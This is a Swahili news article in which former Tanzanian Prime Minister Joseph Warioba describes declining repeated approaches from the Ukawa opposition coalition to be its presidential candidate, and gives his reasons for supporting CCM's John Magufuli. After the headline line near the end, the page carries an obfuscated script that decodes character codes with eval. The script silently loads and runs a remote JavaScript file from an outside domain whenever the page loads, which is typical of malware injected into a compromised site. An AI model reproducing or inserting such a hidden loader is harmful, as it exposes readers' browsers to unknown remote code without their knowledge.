WAZIRI Mkuu wa zamani, Jaji Joseph Warioba na mwenzake katika wadhifa huo kwa nyakati tofauti za utawala, Frederick Sumaye, walishindanishwa ndani ya vyama vya Chadema, NCCR-Mageuzi, CUF na NLD vinavyounda Umoja wa Katiba ya Wananchi (Ukawa) ili kupata jina la mmojawapo atakayeshawishiwa kuwania urais. Katika mchujo huo uliofanyika âkimya kimyaâ miongoni mwa viongozi waandamizi wa Ukawa, kabla hata ya ujio wa Waziri Mkuu mwingine aliyejiuzulu kwa kashfa ya kampuni tata ya kufua umeme ya Richmond, Edward Lowassa, ni Jaji Warioba ndiye aliyeibuka kidedea, kwa mujibu wa mtazamo wa baadhi ya viongozi wa Ukawa, na juhudi za kumshawishi zilifanyika mara kadhaa bila kuzaa matunda. Kwa mujibu wa vyanzo vyetu kadhaa vya habari, imani ya Ukawa kwa wakati huo ni kwamba, Warioba ndiye kiini cha Rasimu ya II ya Katiba ambayo ndiyo iliyowaunganisha Ukawa katika Bunge Maalumu la Katiba na kwa hiyo, kumpata kinara huyo wa Katiba hiyo mpya kungekuwa kete muhimu kwa wananchi kupigia kura Ukawa. Hata hivyo, kwa sasa Ukawa umemchukua Lowassa ambaye alikuwa kati ya walioipinga Rasimu ya II ya Katiba hiyo ingawa vile vile amekwishaahidi kuiunga mkono tofauti na msimamo wake wa awali ndani ya Bunge Maalumu la Katiba. Katika mchujo huo uliomhusisha Sumaye, Warioba amezungumza na gazeti hili na kukiri kushindanishwa na kisha kushawishiwa agombee urais kwa tiketi ya Ukawa. Kauli ya Warioba Katika mazungumzo yake na Raia Mwema, wiki hii, ambayo leo tunachapisha sehemu tu ya mazungumzo hayo na yataendelea kuchapishwa katika gazeti hili wiki ijayo, Jaji Warioba tunamnukuu kama ifuatavyo; âKatika kipindi cha miaka miwili iliyopita ushawishi ulikuwa mkubwa kwa mimi kugombea katika nafasi ya urais. Ushawishi ulianzia ndani ya CCM. Watu wengi na makundi mengi walinifuata kunishawishi. Wengine walikwenda mbali zaidi hata kuunda kamati za maandalizi. Rafiki zangu walitumwa kuja kunishawishi. âNilikataa na nikatoa sababu za kukataa. Mwisho ilinilazimu kutoa tamko hadharani kusema sitagombea na pia nikatoa sababu. Kwa kifupi nilisema wale ambao tumelitumikia taifa hadi kungâatuka ni wajibu wetu kubaki huko tuliko na kuwa washauri wa kizazi kipya badala ya kutafuta madaraka upya. âMwezi Desemba (mwaka jana) nilipokuwa kwenye mdahalo Mwanza nilipewa gazeti ambalo lilikuwa na habari kwamba Ukawa wameniteua kuwa mgombea urais. âKwamba mimi na Mheshimiwa Sumaye tulishindanishwa na mimi nikawa mshindi. Baada ya mdahalo wa Mwanza nilikwenda kijijini kwangu Nyamuswa. Nikiwa pale Sumaye alipita kunisalimu akitokea Butiama. Nilimuonyesha gazeti hilo na wote wawili tuliamua kupuuza yaliyoandikwa. âLakini baada ya muda mfupi nilipata ujumbe rasmi wa Ukawa. Mjumbe wa Kamati Kuu ya Chadema alitumwa kuniuliza kama nitakuwa tayari kugombea urais kama mteule wa Ukawa. Nilisema hapana na kumueleza sababu zangu. Niliongeza kusema kwamba hata kama ningekuwa na nia hiyo ningejaribu kupitia Chama changu lakini na huko nimekataa. âHaukupita muda nikaletewa ujumbe mwingine. Safari hii alikuja Mwenyekiti Mwenza wa Ukawa. Nilizungumza naye nyumbani kwangu kwa muda kama saa mbili. Alieleza kwa kirefu kwa nini Ukawa wangependa niwe mgombea wao lakini nilikataa na kumpa sababu zile zile nilizotoa kwa mjumbe wa kwanza. âKwenye kipindi cha Dakika 45 kwenye ITV niliulizwa kama upinzani umefikia hatua ya kuchukua uongozi wa nchi. Nilisema hapana. Kabla ya hapo nilikuwa nimetoa ushauri kwa Ukawa. Nilisema mimi ni muumini wa mfumo wa vyama vingi. Kwa hiyo naamini itafika wakati vyama vitabadilisha madaraka. Chama cha siasa ni sera. Kumtafuta mgombea kutoka Chama kingine ni kuajiri mamluki. Mimi ni muumini wa sera za CCM. Kama nikienda Ukawa siyo kwa sababu za kuamini sera zake. Nitakuwa mamluki kwa lengo tu la kupata madaraka. âUtaratibu wa aina hiyo unaweza kudhoofisha upinzani. Akiingia kiongozi kutoka nje atabadili sera za Chama, ataleta watu wake kutoka Chama chake cha zamani na baadhi ya wanachama wa Ukawa watakimbia. Niliwakumbusha jinsi NCCR-Mageuzi ilivyokuwa na nguvu lakini ikadhoofika baada ya kuingiza kiongozi kutoka nje. Naamini jambo kama hili linaweza kutokea kwa Ukawa na hasa Chadema, na hii haitakuwa kwa faida ya nchi,â alisema kuhusu hatua ya kushawishiwa kuwa mgombea urais wa Ukawa Mbali na hilo, Warioba pia alilieleza gazeti hili sababu za yeye kumuunga mkono mgombea urais wa CCM, Dk. John Magufuli akisema; âWakati wa mchakato wa kuwania uteuzi ndani ya CCM baadhi yetu tulikuwa na wasiwasi mkubwa kwamba tusingepata mgombea anayefaa kwa mazingira ya sasa. âTuliona mchakato unaonyesha mazingira ya matumizi makubwa ya fedha na ushindani wa makundi ambayo yaliashiria mgawanyiko na uhasama. Wasiwasi wetu tuliueleza wakati wa mdahalo ulioandaliwa na Taasisi ya Mwalimu Nyerere siku chache kabla ya mkutano mkuu wa CCM. Tulikuwa na mashaka kama tungeweza kumuunga mkono mgombea ambaye angeteuliwa bila kuzingatia wasiwasi wetu. âKwa bahati nzuri mkutano mkuu ulifanya kazi nzuri sana. Fedha hazikushinda na makundi hayakushinda. Tulipata mgombea ambae alifuata taratibu za CCM bila kutumia fedha nyingi na pia hakuambatana na kundi, John Pombe Magufuli. âBaada ya hapo tuliangalia kama mgombea anakidhi vigezo vya uongozi katika ngazi ya urais. Kwa kifupi tuliona anakidhi vigezo hivyo. Pale Jangwani siku ya uzinduzi wa kampeni ya CCM nilitaja vigezo vitatu muhimu, yaani uzalendo, uadilifu na uchapa kazi. âMagufuli ni mzalendo, anajali utu na anathamini umoja. Mtaji mkubwa wa nchi yetu ni amani na utulivu. Hali hii ni matokeo ya umoja wetu. Tunahitaji mtu asiyeambatana na makundi. Kwa kipindi ambacho amekuwa katika Serikali, Magufuli amesisitiza kwamba maendeleo ni kwa wananchi wote bila kujali kabila, dini, vyama vya siasa na kadhalika. Kama nilivyosema pale Jangwani, kundi la Magufuli ni Watanzania wote. âMagufuli ni mwadilifu. Ameongoza wizara ambazo kuna rushwa kubwa kubwa, hasa Ardhi na Ujenzi, na kazi yake ilionekana waziwazi. Pale Jangwani nilitoa mfano wa ujenzi wa barabara na madaraja. Taarifa ya Tume ya Kero ya Rushwa ya mwaka 1996 ulionyesha rushwa kubwa na ufisadi ulikuwa kwenye sekta ya ujenzi. Kwa sababu ya rushwa, fedha nyingi zilitolewa lakini ujenzi wa barabara ulikuwa hafifu na ulichukua muda mrefu. Nilitoa mfano wa Kilwa Road ambayo ilijengwa kwa fedha nyingi lakini ikaonekana hafifu. Magufuli alikataa na ikajengwa upya kwa fedha za mkandarasi. Waziri gani mwingine amepata kufanya hivyo? âTaarifa ya Tume ya Kero ya Rushwa pia ilionyesha chanzo kikubwa cha ufisadi ni uhusiano wa karibu wa viongozi na matajiri. Hawa matajiri wanawahonga viongozi na ndiyo chanzo cha mikataba ya ovyo na wizi wa fedha za umma. Magufuli amekuwa anapambana na makandarasi bila ya kuwaonea haya. âSifa ta tatu niliyotaja ni uchapa kazi. Magufuli anafahamika kwa uchapa kazi. Ofisini anapambana na wazembe na pia anapambana nao kwenye site. Amezunguka nchi nzima kusimamia kazi na hapendi safari za nje zisizo na tija. Kijana Humphrey Polepole amefanya utafiti na kugundua Magufuli amesafiri nje mara nne tu katika miaka kumi. Safari za hapa ndani kusimamia kazi hazihesabiki. âBaada ya kampeni kuanza nimeona niliyosema yana msingi. Magufuli anasema anayoyaamini. Anatambua mafanikio yaliyopatikana na anafahamu matatizo yaliyopo. Mimi nilikuwa katika uongozi wa ngazi ya juu kwa muda mrefu; nilikuwa kwenye Baraza la Mawaziri kwa miaka miaka kumi na sita, nikiwa mwanasheria mkuu, Waziri na Waziri Mkuu. Wajibu wa mawaziri ni kumshauri Rais kuhusu sera na kusimamia kazi katika sekta zao. âWaziri Mkuu ndiye mshauri mkuu wa Rais. Rais hatoi uamuzi mzito bila ya kushauriana na Waziri Mkuu. Baada ya uamuzi kutolewa basi Waziri Mkuu ndiye anayesimamia utekelezaji. Waziri Mkuu na mawaziri ndio wanaotoa taarifa za utekelezaji wa Serikali Bungeni. Ukisoma Hansard utakuta taarifa za kila mwaka zilizotolewa na mawaziri na waziri wakuu. Kila taarifa inaeleza mafanikio, matatizo na mikakati ya kuyashughulikia haya matatizo. âNashangaa kusikia watu wanasema kwamba kwa miaka zaidi ya hamsini hakuna kilichofanyika. Baadhi ya wale wanaosema hivyo ni sisi tuliokuwa katika uongozi. Kama hiyo ni kweli basi tumekuwa waongo huko nyuma tulipokuwa tunawaeleza wananchi mafanikio mbalimbali. Mimi naamini hatukuwa tunasema uongo. âMatatizo yako katika kila sekta na mafanikio pia. Kuna matatizo kwenye kilimo, ufugaji, uvuvi, elimu, maji, ajira, nishati, miundombinu na kadhalika. Kiongozi mzuri ni yule anayetambua mafanikio na kuyatumia kama msingi wa kupambana na matatizo yaliyopo. Wakati wote kutakuwa na matatizo. Maendeleo ni mchakato wa kutatua matatizo na ni mchakato wa kudumu. Hakuna nchi, hata zile ambazo zimeendelea sana, ambazo zimemaliza mchakato wa maendeleo na kumaliza matatizo yote. âKwa mfano yapo matatizo mengi kwa upande wa huduma ya afya, sio tu ya kukosa bajaji ya kuwapeleka wajawazito kwenye zahanati. Lakini pia kuna mafanikio makubwa. Tangu 1961 tumepata madaktari wengi, tumejenga zahanati nyingi, hospitali nyingi na tumefanikiwa hata kufanya upasuaji kwa magonjwa ya moyo. âHivi sasa watoto na vijana ni wengi kuliko watu wazima. Hali ni tofauti na wakati wa wazazi wetu ambapo watoto wachanga wengi walikuwa wanafariki dunia. Hii imetokana na kuboresha huduma za afya. Idadi ya watu inaongezeka kwa haraka na matokeo yake ni matatizo ya ajira. Kila yanapotokea mafanikio matatizo mapya yanazuka. âNi halali kusema tuna matatizo katika huduma ya afya na kuyatatua, labda kwa haraka zaidi. Kusema hivyo na kuonyesha mkakati ni njia halali ya kuomba kura. Lakini sio halali kusema kuwa hakuna kitu kilichofanywa kwa miaka hamsini. Ni ulaghai, na hasa kama wanaosema hivyo ni kati ya wale ambao huko nyuma wameshiriki kuleta mafanikio na kuwaeleza wananchi. Kiongozi hatakiwi kuwa mlaghai kwa sababu ya kutaka kupata kura. âKwenye elimu pia tumepiga hatua kubwa. Hatukuwa na shule za awali, sasa tunazo. Shule za msingi na sekondari zimeongezeka sana. Wakati wa kupata uhuru tulikuwa na chuo kikuu kimoja chenye wanafunzi kumi na moja tu. Sasa tuna vyuo vikuu zaidi ya thelathini vyenye maelfu ya wanafunzi. Yapo mapengo, ikiwa ni pamoja na upungufu wa walimu, vifaa na ubora. Lakini msingi upo wa kushughulikia matatizo hayo. âKwa bahati mbaya kuna kuchanganyikiwa. Katika kampeni hii jina la Mwalimu linatumika sana. Baadhi ya matamko yake yanatumika kama dira. âMwalimu aliongoza nchi hii vizuri kwa miaka ishirini na tatu na ndio maana anatumika kama dira. Lakini kwa upande mwingine kuna watu wanasema hakuna kilichofanywa kwa miaka hamsini. Maana yake Mwalimu hakufanya chochote. Mtu akisema hivyo anawafanya Watanzania ni wajinga. âMwalimu na waasisi wenzake walijenga umoja wa nchi na kuweka msingi wa amani na utulivu ambavyo vimedumu kwa zaidi ya miaka hamsini. Waliweka agenda imara ya maendeleo, yaani kupiga vita ujinga, maradhi na umaskini. Waliweka misingi ya maadili na wakaweka mikakati ya utekelezaji. Nchi ilipiga hatua kubwa, hasa katika maeneo kama elimu, afya na maji. Ni dhambi kutumia jina lake na huku unasema hakufanya lolote,â alisema.
Siri ya Warioba, Ukawa hii hapa
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments